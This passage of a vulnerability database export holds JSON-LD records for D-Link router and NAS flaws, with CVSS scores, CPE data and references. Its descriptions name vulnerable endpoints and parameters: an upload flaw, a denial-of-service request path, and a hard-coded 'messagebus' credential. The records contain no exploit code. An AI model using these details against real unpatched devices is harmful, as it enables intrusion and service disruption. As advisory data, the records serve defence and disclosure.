"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202309-0939",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dar-7000",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "20151231"
},
{
"model": "dar-8000",
"scope": "lte",
"trust": 1.0,
"vendor": "dlink",
"version": "20151231"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5145"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dar-7000_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "20151231",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dar-7000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dar-8000_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "20151231",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dar-8000:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5145"
}
]
},
"cve": "CVE-2023-5145",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "cna@vuldb.com",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@vuldb.com",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 3.4,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
],
"severity": [
{
"author": "cna@vuldb.com",
"id": "CVE-2023-5145",
"trust": 1.0,
"value": "MEDIUM"
},
{
"author": "NVD",
"id": "CVE-2023-5145",
"trust": 1.0,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5145"
},
{
"db": "NVD",
"id": "CVE-2023-5145"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "** UNSUPPORTED WHEN ASSIGNED ** A vulnerability has been found in D-Link DAR-7000 up to 20151231 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /sysmanage/licence.php. The manipulation of the argument file_upload leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-240241 was assigned to this vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5145"
},
{
"db": "VULMON",
"id": "CVE-2023-5145"
}
],
"trust": 0.99
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "VULDB",
"id": "240241",
"trust": 1.1
},
{
"db": "DLINK",
"id": "SAP10354",
"trust": 1.1
},
{
"db": "NVD",
"id": "CVE-2023-5145",
"trust": 1.1
},
{
"db": "VULMON",
"id": "CVE-2023-5145",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-5145"
},
{
"db": "NVD",
"id": "CVE-2023-5145"
}
]
},
"id": "VAR-202309-0939",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2024-06-06T19:22:15.323000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-434",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-5145"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.1,
"url": "https://vuldb.com/?id.240241"
},
{
"trust": 1.1,
"url": "https://vuldb.com/?ctiid.240241"
},
{
"trust": 1.1,
"url": "https://github.com/llixixi/cve/blob/main/d-link-dar-7000_upload_%20licence.md"
},
{
"trust": 1.1,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10354"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/434.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-5145"
},
{
"db": "NVD",
"id": "CVE-2023-5145"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2023-5145"
},
{
"db": "NVD",
"id": "CVE-2023-5145"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-09-25T00:00:00",
"db": "VULMON",
"id": "CVE-2023-5145"
},
{
"date": "2023-09-25T00:15:10.217000",
"db": "NVD",
"id": "CVE-2023-5145"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-09-25T00:00:00",
"db": "VULMON",
"id": "CVE-2023-5145"
},
{
"date": "2024-06-05T21:15:13.860000",
"db": "NVD",
"id": "CVE-2023-5145"
}
]
}
}
VAR-202108-0937
Vulnerability from variot - Updated: 2024-06-05 23:20Null Pointer Dereference vulnerability in D-Link DIR-825 2.10b02, which could let a remote malicious user cause a denial of service. The vulnerability could be triggered by sending an HTTP request with URL /vct_wan; the sbin/httpd would invoke the strchr function and take NULL as a first argument, which finally leads to the segmentation fault. NOTE: The DIR-825 and all hardware revisions is considered End of Life and as such this issue will not be patched. ** Not supported ** This is a vulnerability in an unsupported product. D-Link DIR-825 for, NULL There is a vulnerability in pointer dereference.Service operation interruption (DoS) It may be in a state. D-Link DIR-825 is a router made by D-Link in Taiwan
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202108-0937",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-825",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "2.10b02"
},
{
"model": "dir-825",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": "dir-825 firmware 2.10b02"
},
{
"model": "dir-825",
"scope": "eq",
"trust": 0.8,
"vendor": "d link",
"version": null
},
{
"model": "dir-825 2.10b02",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94844"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010701"
},
{
"db": "NVD",
"id": "CVE-2021-29296"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-825_firmware:2.10b02:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-825:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-29296"
}
]
},
"cve": "CVE-2021-29296",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"integrityImpact": "NONE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 5.0,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2021-29296",
"impactScore": null,
"integrityImpact": "None",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"exploitabilityScore": 10.0,
"id": "CNVD-2021-94844",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2021-29296",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2021-29296",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNVD",
"id": "CNVD-2021-94844",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-202108-1027",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2021-29296",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94844"
},
{
"db": "VULMON",
"id": "CVE-2021-29296"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010701"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1027"
},
{
"db": "NVD",
"id": "CVE-2021-29296"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Null Pointer Dereference vulnerability in D-Link DIR-825 2.10b02, which could let a remote malicious user cause a denial of service. The vulnerability could be triggered by sending an HTTP request with URL /vct_wan; the sbin/httpd would invoke the strchr function and take NULL as a first argument, which finally leads to the segmentation fault. NOTE: The DIR-825 and all hardware revisions is considered End of Life and as such this issue will not be patched. ** Not supported ** This is a vulnerability in an unsupported product. D-Link DIR-825 for, NULL There is a vulnerability in pointer dereference.Service operation interruption (DoS) It may be in a state. D-Link DIR-825 is a router made by D-Link in Taiwan",
"sources": [
{
"db": "NVD",
"id": "CVE-2021-29296"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010701"
},
{
"db": "CNVD",
"id": "CNVD-2021-94844"
},
{
"db": "VULMON",
"id": "CVE-2021-29296"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-29296",
"trust": 3.9
},
{
"db": "DLINK",
"id": "SAP10212",
"trust": 1.7
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010701",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2021-94844",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1027",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-29296",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94844"
},
{
"db": "VULMON",
"id": "CVE-2021-29296"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010701"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1027"
},
{
"db": "NVD",
"id": "CVE-2021-29296"
}
]
},
"id": "VAR-202108-0937",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94844"
}
],
"trust": 1.0733768399999999
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94844"
}
]
},
"last_update_date": "2024-06-05T23:20:20.327000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "",
"trust": 0.8,
"url": "https://www.dlink.com/en/security-bulletin"
},
{
"title": "Patch for D-Link DIR-825 Null Pointer Dereference Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/302926"
},
{
"title": "D-Link DIR-825 Security vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=159403"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94844"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010701"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1027"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-476",
"trust": 1.0
},
{
"problemtype": "NULL Pointer dereference (CWE-476) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-010701"
},
{
"db": "NVD",
"id": "CVE-2021-29296"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://www.dlink.com/en/security-bulletin/"
},
{
"trust": 1.7,
"url": "https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=sap10212"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-29296"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/476.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2021-94844"
},
{
"db": "VULMON",
"id": "CVE-2021-29296"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010701"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1027"
},
{
"db": "NVD",
"id": "CVE-2021-29296"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2021-94844"
},
{
"db": "VULMON",
"id": "CVE-2021-29296"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-010701"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-1027"
},
{
"db": "NVD",
"id": "CVE-2021-29296"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-12-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-94844"
},
{
"date": "2021-08-10T00:00:00",
"db": "VULMON",
"id": "CVE-2021-29296"
},
{
"date": "2022-07-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-010701"
},
{
"date": "2021-08-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202108-1027"
},
{
"date": "2021-08-10T20:15:08.530000",
"db": "NVD",
"id": "CVE-2021-29296"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-12-07T00:00:00",
"db": "CNVD",
"id": "CNVD-2021-94844"
},
{
"date": "2021-08-17T00:00:00",
"db": "VULMON",
"id": "CVE-2021-29296"
},
{
"date": "2022-07-07T02:35:00",
"db": "JVNDB",
"id": "JVNDB-2021-010701"
},
{
"date": "2021-08-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202108-1027"
},
{
"date": "2024-06-04T19:17:04.097000",
"db": "NVD",
"id": "CVE-2021-29296"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202108-1027"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link\u00a0DIR-825\u00a0 In \u00a0NULL\u00a0 Pointer dereference vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-010701"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "code problem",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202108-1027"
}
],
"trust": 0.6
}
}
VAR-202404-0069
Vulnerability from variot - Updated: 2024-06-05 23:17** UNSUPPORTED WHEN ASSIGNED ** A vulnerability, which was classified as very critical, has been found in D-Link DNS-320L, DNS-325, DNS-327L and DNS-340L up to 20240403. This issue affects some unknown processing of the file /cgi-bin/nas_sharing.cgi of the component HTTP GET Request Handler. The manipulation of the argument user with the input messagebus leads to hard-coded credentials. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-259283. NOTE: This vulnerability only affects products that are no longer supported by the maintainer. NOTE: Vendor was contacted early and confirmed immediately that the product is end-of-life. It should be retired and replaced. D-Link DNS-320L firmware, dns-120 firmware, dnr-202l firmware etc. D-Link Systems, Inc. The product contains a vulnerability related to the use of hardcoded credentials.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202404-0069",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dns-320l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dnr-202l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-327l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-1550-04",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-1200-05",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-340l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-320lw",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-326",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dnr-326",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dnr-322l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-345",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-321",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "dns-1100-4",
"scope": "eq",
